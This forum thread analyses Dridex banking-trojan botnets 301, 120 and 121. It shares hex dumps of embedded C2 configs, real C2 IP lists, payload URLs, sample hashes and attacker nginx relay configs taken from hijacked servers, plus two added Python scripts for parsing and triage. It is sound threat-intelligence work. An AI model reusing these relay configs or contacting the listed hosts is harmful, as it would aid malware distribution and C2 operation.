A forum for reverse engineering, OS internals and malware analysis 

 #27063  by Xylitol
 Tue Oct 27, 2015 11:43 am
Dridex 301 https://www.virustotal.com/en/file/b029 ... /analysis/
unpacked (in attachment): https://www.virustotal.com/en/file/1f20 ... 445944500/
00410960 $ 60 PUSHAD
Code:
0168F68C  3C 63 6F 6E 66 69 67 20 62 6F 74 6E 65 74 3D 22  <config botnet="
0168F69C  33 30 31 22 3E 0D 0A 20 20 20 3C 73 65 72 76 65  301">..   <serve
0168F6AC  72 5F 6C 69 73 74 3E 0D 0A 34 36 2E 33 37 2E 31  r_list>..46.37.1
0168F6BC  2E 38 38 3A 34 37 33 0D 0A 39 31 2E 31 34 32 2E  .88:473..91.142.
0168F6CC  32 32 31 2E 31 39 35 3A 35 34 34 35 0D 0A 31 39  221.195:5445..19
0168F6DC  38 2E 38 39 2E 39 38 2E 32 31 32 3A 33 34 34 33  8.89.98.212:3443
0168F6EC  0D 0A 20 20 20 3C 2F 73 65 72 76 65 72 5F 6C 69  ..   </server_li
0168F6FC  73 74 3E 0D 0A 3C 2F 63 6F 6E 66 69 67 3E        st>..</config>
004108C0 /$ 57 PUSH EDI
Code:
01512688  3C 6C 6F 61 64 65 72 3E 3C 67 65 74 5F 6D 6F 64  <loader><get_mod
01512698  75 6C 65 20 75 6E 69 71 75 65 3D 22 25 73 22 20  ule unique="%s"
015126A8  62 6F 74 6E 65 74 3D 22 25 64 22 20 73 79 73 74  botnet="%d" syst
015126B8  65 6D 3D 22 25 64 22 20 6E 61 6D 65 3D 22 25 73  em="%d" name="%s
015126C8  22 20 62 69 74 3D 22 25 64 22 2F 3E              " bit="%d"/>
Dridex + Bruteres: inside the dridex spam machine ~ https://www.lexsi.com/securityhub/dride ... e/?lang=en
Attachments: infected (76.06 KiB), infected (53.88 KiB)
 #27075  by Xylitol
 Wed Oct 28, 2015 10:58 am
Dridex 120 https://www.virustotal.com/en/file/2fdd ... /analysis/ - VxVault
Renamed as 'fsociety.exe' instead of 'crypted120med.exe'
Unpacked in attachment.
Code:
0178F68C  3C 63 6F 6E 66 69 67 20 62 6F 74 6E 65 74 3D 22  <config botnet="
0178F69C  31 32 30 22 3E 0D 0A 20 20 20 3C 73 65 72 76 65  120">..   <serve
0178F6AC  72 5F 6C 69 73 74 3E 0D 0A 35 2E 31 38 37 2E 34  r_list>..5.187.4
0178F6BC  2E 31 38 33 3A 34 37 33 0D 0A 36 38 2E 31 36 39  .183:473..68.169
0178F6CC  2E 35 34 2E 31 37 39 3A 36 34 34 36 0D 0A 36 37  .54.179:6446..67
0178F6DC  2E 32 31 31 2E 39 35 2E 32 32 38 3A 35 34 34 35  .211.95.228:5445
0178F6EC  0D 0A 20 20 20 3C 2F 73 65 72 76 65 72 5F 6C 69  ..   </server_li
0178F6FC  73 74 3E 0D 0A 3C 2F 63 6F 6E 66 69 67 3E 00 00  st>..</config>..
Attachments: infected (53.86 KiB)
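The two dumps above (botnet 301 and botnet 120) show the same thing: the Dridex static config is a plain-text `<config>` XML block sitting in the unpacked binary's memory. As an added example (not from the thread), here is a small Python script that rebuilds the raw bytes from an OllyDbg-style hex dump pasted exactly as above, carves the `<config>...</config>` block and parses out the botnet id and the C2 list. The embedded sample is the botnet 301 dump from the first post; the ASCII column is ignored because it is lossy (non-printables are shown as `.`).

```python
"""Carve a Dridex <config> block out of an OllyDbg-style hex dump.

Added example, not code from the thread. Rebuilds raw bytes from the hex
column of a pasted dump, carves the first <config>...</config> block and
returns the botnet id plus the C2 list as (host, port) tuples.
"""
import re
import xml.etree.ElementTree as ET

# Sample input: the botnet 301 dump as pasted in the thread.
SAMPLE_DUMP = """\
0168F68C  3C 63 6F 6E 66 69 67 20 62 6F 74 6E 65 74 3D 22  <config botnet="
0168F69C  33 30 31 22 3E 0D 0A 20 20 20 3C 73 65 72 76 65  301">..   <serve
0168F6AC  72 5F 6C 69 73 74 3E 0D 0A 34 36 2E 33 37 2E 31  r_list>..46.37.1
0168F6BC  2E 38 38 3A 34 37 33 0D 0A 39 31 2E 31 34 32 2E  .88:473..91.142.
0168F6CC  32 32 31 2E 31 39 35 3A 35 34 34 35 0D 0A 31 39  221.195:5445..19
0168F6DC  38 2E 38 39 2E 39 38 2E 32 31 32 3A 33 34 34 33  8.89.98.212:3443
0168F6EC  0D 0A 20 20 20 3C 2F 73 65 72 76 65 72 5F 6C 69  ..   </server_li
0168F6FC  73 74 3E 0D 0A 3C 2F 63 6F 6E 66 69 67 3E        st>..</config>
"""

# One dump line: 8-hex-digit address, whitespace, 1..16 "XX " byte groups.
# The ASCII column is separated by at least two spaces, so the byte-group
# repetition stops there; the ASCII text itself is never consumed.
_LINE = re.compile(r"^\s*([0-9A-Fa-f]{8})\s+((?:[0-9A-Fa-f]{2}\s){1,16})")

# ip:port entries as they appear inside <server_list>
_C2 = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")


def dump_to_bytes(dump: str) -> bytes:
    """Rebuild raw bytes from the hex column; non-dump lines are skipped."""
    out = bytearray()
    for line in dump.splitlines():
        m = _LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(2))  # fromhex ignores the spaces
    return bytes(out)


def extract_config(blob: bytes) -> dict:
    """Carve the first <config> block and parse botnet id and C2 list.

    Trailing NUL padding (as in the botnet 120 dump) is outside the carved
    span, so it does not disturb the XML parser.
    """
    m = re.search(rb"<config\b.*?</config>", blob, re.DOTALL)
    if not m:
        raise ValueError("no <config> block in dump")
    root = ET.fromstring(m.group(0).decode("latin-1"))
    botnet = root.get("botnet")
    if botnet is None:
        raise ValueError("<config> has no botnet attribute")
    servers = []
    for tok in (root.findtext("server_list") or "").split():
        c2 = _C2.match(tok)
        if not c2:
            raise ValueError(f"unexpected server_list entry: {tok!r}")
        servers.append((c2.group(1), int(c2.group(2))))
    return {"botnet": int(botnet), "servers": servers}


def parse_dump(dump: str) -> dict:
    """Convenience wrapper: pasted dump text in, parsed config out."""
    return extract_config(dump_to_bytes(dump))


if __name__ == "__main__":
    cfg = parse_dump(SAMPLE_DUMP)
    print(f"botnet {cfg['botnet']}")
    for host, port in cfg["servers"]:
        print(f"  {host}:{port}")
```

The same routine works unchanged on the botnet 120 dump in the second post; only the carve regex matters, so the `00 00` padding after `</config>` there is harmless.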
 #27080  by benkow_
 Wed Oct 28, 2015 1:56 pm
Hi,
A quick look around Botnet 120 (botnet targeting France):
Inside the .doc macro, you can find some payload URLs: XXX.XXX.XXX:XXX/images/getimg.php or /uniq/load.php
All these servers are just Nginx proxies. They are infected via some WordPress vuln or other old web vuln.
On these servers you can see 3 processes running. For example:
Code:
root      6616  0.0  0.0   3944   620 ?        Ss   Oct19   0:00 /tmp/.estbuild/lib/ld-linux.so.2
root      6617  0.0  0.1   4880  1944 ?        S    Oct19   0:05 /tmp/.estbuild/lib/ld-linux.so.2
root      6618  0.0  0.1   4884  1948 ?        S    Oct19   0:08 /tmp/.estbuild/lib/ld-linux.so.2
This is the proxy stuff (attached as .estbuild.7zip).
Some references about this on Stack Overflow:
http://stackoverflow.com/questions/3322 ... 120med-exe
By dumping the processes' memory you can find the proxy configuration:
Code:
worker_processes                  2;
error_log                         /dev/null;
pid                               /tmp/.estbuild/nginx.pid;
events {
    worker_connections            4096;
#    use                           epoll;    
}
http {
    access_log			  /dev/null;
    client_max_body_size        	   200m;
    chunked_transfer_encoding off;
    server {
        listen                    8080;
	location /m348-2hdk-cb2 {
		information;
	}
        
        
        location / {
		proxy_pass                 http://95.211(.)241.118:8500;
		proxy_redirect             off;
		proxy_set_header           Host             $host;
		proxy_set_header           X-Forwarded-For  $remote_addr;
		proxy_set_header           X-Real-IP        $remote_addr;
		proxy_connect_timeout      180;
		proxy_send_timeout         180;
		proxy_read_timeout         180;
		proxy_buffer_size          4k;
		proxy_buffers              4 32k;
		proxy_busy_buffers_size    64k;
		proxy_temp_file_write_size 64k;
		proxy_temp_path            /tmp/.estbuild/tmp/;
	}
   }
}
So, the real server seems to be 95.211(.)241.118 (it has been up for more than 2 weeks).
For 2 weeks (and maybe more) this server has spread:
0353a7702daeb560d64b10947458206a
9d4225ecdcda7fe9a5eae48601919114
1c21aeb3dc0e30e05630a3f61aae83f9
c4934e3e1858dbbeb4ea872d0fdbbd79
82bb00dcac6411669ce6ae5a60cbb3b3
8829bf4bc1400360e28ccc88c669c129
8b27c369dc690b4cb31b3c6ff114c7bf
2b2bd1166a8ed8fbcc34924c4f920083
fcb74bbc59d90a51df252c2b695cb679
a44db256a22cd0e61e3630976d82a351
f91c822fa2ce62ab8bd6419764262c70

An example of the static conf of these samples:
Code:
<config botnet="120">
<server_list>
5.187.4.183:473
68.169.54.179:6446
67.211.95.228:5445
</server_list>
</config> 
For these servers, same stuff as for the payload spreading: shitty WordPress + old vuln = Nginx proxy.
A little difference exists: in /tmp/.estbuild/certs/ you can find some certs:
Code:
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----

-----BEGIN PRIVATE KEY-----
...
-----END PRIVATE KEY-----
And the proxy conf:
Code:
worker_processes                  2;

error_log                         /dev/null;
pid                               /tmp/.estbuild/nginx.pid;
events {
    worker_connections            4096;
#    use                           epoll;    
}
http {
    access_log			  /dev/null;
    client_max_body_size        	   200m;
    chunked_transfer_encoding off;
    server {
        listen                    5445;
	location /m348-2hdk-cb2 {
		information;
	}
        ssl                       on;
        ssl_certificate           /tmp/.estbuild/certs/server.crt;
        ssl_certificate_key       /tmp/.estbuild/certs/server.key;
        location / {
		proxy_pass                 http://87.249.215.200:8002;
		proxy_redirect             off;
		proxy_set_header           Host             $host;
		proxy_set_header           X-Forwarded-For  $remote_addr;
		proxy_set_header           X-Real-IP        $remote_addr;
		proxy_connect_timeout      180;
		proxy_send_timeout         180;
		proxy_read_timeout         180;
		proxy_buffer_size          4k;
		proxy_buffers              4 32k;
		proxy_busy_buffers_size    64k;
		proxy_temp_file_write_size 64k;
		proxy_temp_path            /tmp/.estbuild/tmp/;
	}
   }
}
I hope it can help somebody.
Attachments: (1.73 MiB)
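The two proxy configs in the post are the same template with a different listen port and upstream. As an added example (not part of the post or of the attached .estbuild archive), here is a Python triage script that flattens an nginx config like the dumped ones, pulls out the listen port and the `proxy_pass` upstream, and flags the markers a responder would key on: logs sent to /dev/null, pid, temp and cert paths under a hidden directory in /tmp, a directive (`information`) that stock nginx does not know, and TLS terminated at the relay with plaintext http to the real server behind it. `KNOWN_DIRECTIVES` is a minimal allowlist I wrote for this sample, not the full nginx directive set, and the embedded config is an abridged copy of the second posted one.

```python
"""Triage an nginx config recovered from a suspected relay box.

Added example, not from the thread or the .estbuild archive. Flattens the
config into (context, directive, args) triples and reports the upstream the
relay forwards to plus indicators of a covert deployment. KNOWN_DIRECTIVES
is a minimal allowlist written for this sample, not the full nginx set.
"""
import re

# Sample input: abridged copy of the second proxy config posted in the thread.
SAMPLE_CONF = """\
worker_processes                  2;
error_log                         /dev/null;
pid                               /tmp/.estbuild/nginx.pid;
events {
    worker_connections            4096;
#    use                           epoll;
}
http {
    access_log                    /dev/null;
    client_max_body_size          200m;
    server {
        listen                    5445;
        location /m348-2hdk-cb2 {
            information;
        }
        ssl on; ssl_certificate /tmp/.estbuild/certs/server.crt; ssl_certificate_key /tmp/.estbuild/certs/server.key;
        location / {
            proxy_pass                 http://87.249.215.200:8002;
            proxy_redirect             off;
            proxy_set_header           X-Forwarded-For  $remote_addr;
            proxy_temp_path            /tmp/.estbuild/tmp/;
        }
    }
}
"""

KNOWN_DIRECTIVES = {
    "worker_processes", "error_log", "pid", "worker_connections", "use",
    "access_log", "client_max_body_size", "chunked_transfer_encoding", "listen",
    "ssl", "ssl_certificate", "ssl_certificate_key", "proxy_pass", "proxy_redirect",
    "proxy_set_header", "proxy_connect_timeout", "proxy_send_timeout",
    "proxy_read_timeout", "proxy_buffer_size", "proxy_buffers",
    "proxy_busy_buffers_size", "proxy_temp_file_write_size", "proxy_temp_path",
}


def parse_nginx(text: str) -> list:
    """Flatten nginx syntax into (context_path, directive, args) triples.

    Comments are stripped first; '{' opens a block named by the words before
    it, ';' closes a directive, '}' pops the block. Sufficient for configs of
    this shape (no quoted strings containing braces or semicolons).
    """
    text = re.sub(r"#[^\n]*", "", text)
    tokens = re.findall(r"[{};]|[^\s{};]+", text)
    ctx, words, out = [], [], []
    for tok in tokens:
        if tok == ";":
            if words:
                out.append((tuple(ctx), words[0], tuple(words[1:])))
            words = []
        elif tok == "{":
            ctx.append(" ".join(words))
            words = []
        elif tok == "}":
            ctx.pop()
        else:
            words.append(tok)
    return out


def triage(text: str) -> dict:
    """Report listen ports, proxy_pass upstreams and covert-deployment indicators."""
    report = {"listen": [], "upstreams": [], "tls": False, "indicators": []}
    for ctx, name, args in parse_nginx(text):
        arg0 = args[0] if args else ""
        where = " > ".join(ctx) or "main"
        if name == "listen":
            report["listen"].append(arg0)
        elif name == "proxy_pass":
            report["upstreams"].append(arg0)
        elif name == "ssl" and arg0 == "on":
            report["tls"] = True
        elif name in ("error_log", "access_log") and arg0 == "/dev/null":
            report["indicators"].append(f"{name} discarded to /dev/null")
        # runtime files in /tmp or a dot-directory: nothing a packaged nginx does
        if arg0.startswith("/tmp/") or "/." in arg0:
            report["indicators"].append(f"{name} uses a path under /tmp or a hidden dir: {arg0}")
        # e.g. 'information' in the posted configs: a custom module, not stock nginx
        if name not in KNOWN_DIRECTIVES:
            report["indicators"].append(f"non-standard directive '{name}' in '{where}'")
    if report["tls"] and any(u.startswith("http://") for u in report["upstreams"]):
        report["indicators"].append("TLS terminated at the relay, plaintext http to upstream")
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_CONF)
    print("listens on", r["listen"], "forwards to", r["upstreams"])
    for ind in r["indicators"]:
        print(" -", ind)
```

Run it against a config carved from process memory (as in the post) rather than from disk, since the binary in /tmp/.estbuild carries the config itself; the upstream in `proxy_pass` is the address worth pivoting on, and the TLS indicator tells you the relay-to-upstream leg is capturable in clear if you can tap it.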
 #27136  by benkow_
 Tue Nov 03, 2015 8:29 am
Dridex 120 changed to 121. Sample attached.
Always the same server but a different pattern:
Code:
95.211.241.118:8500/imagess/getimg.php
Code:
<config botnet="121">
<server_list>
128.199.239.142:8843
5.187.4.183:43
68.169.54.179:6446
67.211.95.228:5445
</server_list>
</config>
Attachments: infected (187.78 KiB)
 #27223  by kekieres
 Fri Nov 13, 2015 3:43 pm
Hi,

Some of my users have received the attached .DOC that looks like malware:
https://malwr.com/analysis/N2I1MjljYzIz ... E2ZTQyNjM/

But no A/V detects it as malicious on VT:
https://www.virustotal.com/es/file/9365 ... 447428618/

The sample in malwr.com did a POST request to XXX://<109.234.37.214>/alikaps/terminator.php and the response is another exe, named ulysse.exe.

I've stopped here and haven't analyzed anything about the 2nd stage. I'm not a reverse engineer, but I suspect the DOC file is probably something known using a crypter; just in case it is something really new, I'm sharing it here.

Happy reversing!

Kekieres
Attachments: (11.97 KiB)
 #27225  by Xylitol
 Fri Nov 13, 2015 6:58 pm
Attachments: infected (50.75 KiB)
 #27377  by benkow_
 Tue Dec 08, 2015 10:13 am
Botnet 120/121 spreads a new sample.
Conf obfuscation seems to have changed. No more .sdata section.
hxxp://91.203.5.169/jeremy/clarkson.php
hxxp://92.63.101.229/jeremy/clarkson.php
hxxp://91.223.88.50/jeremy/clarkson.php

94.73.155.11:2448
115.249.247.26:4538
87.106.101.55:4538

Attached.
Attachments: infected (191.53 KiB)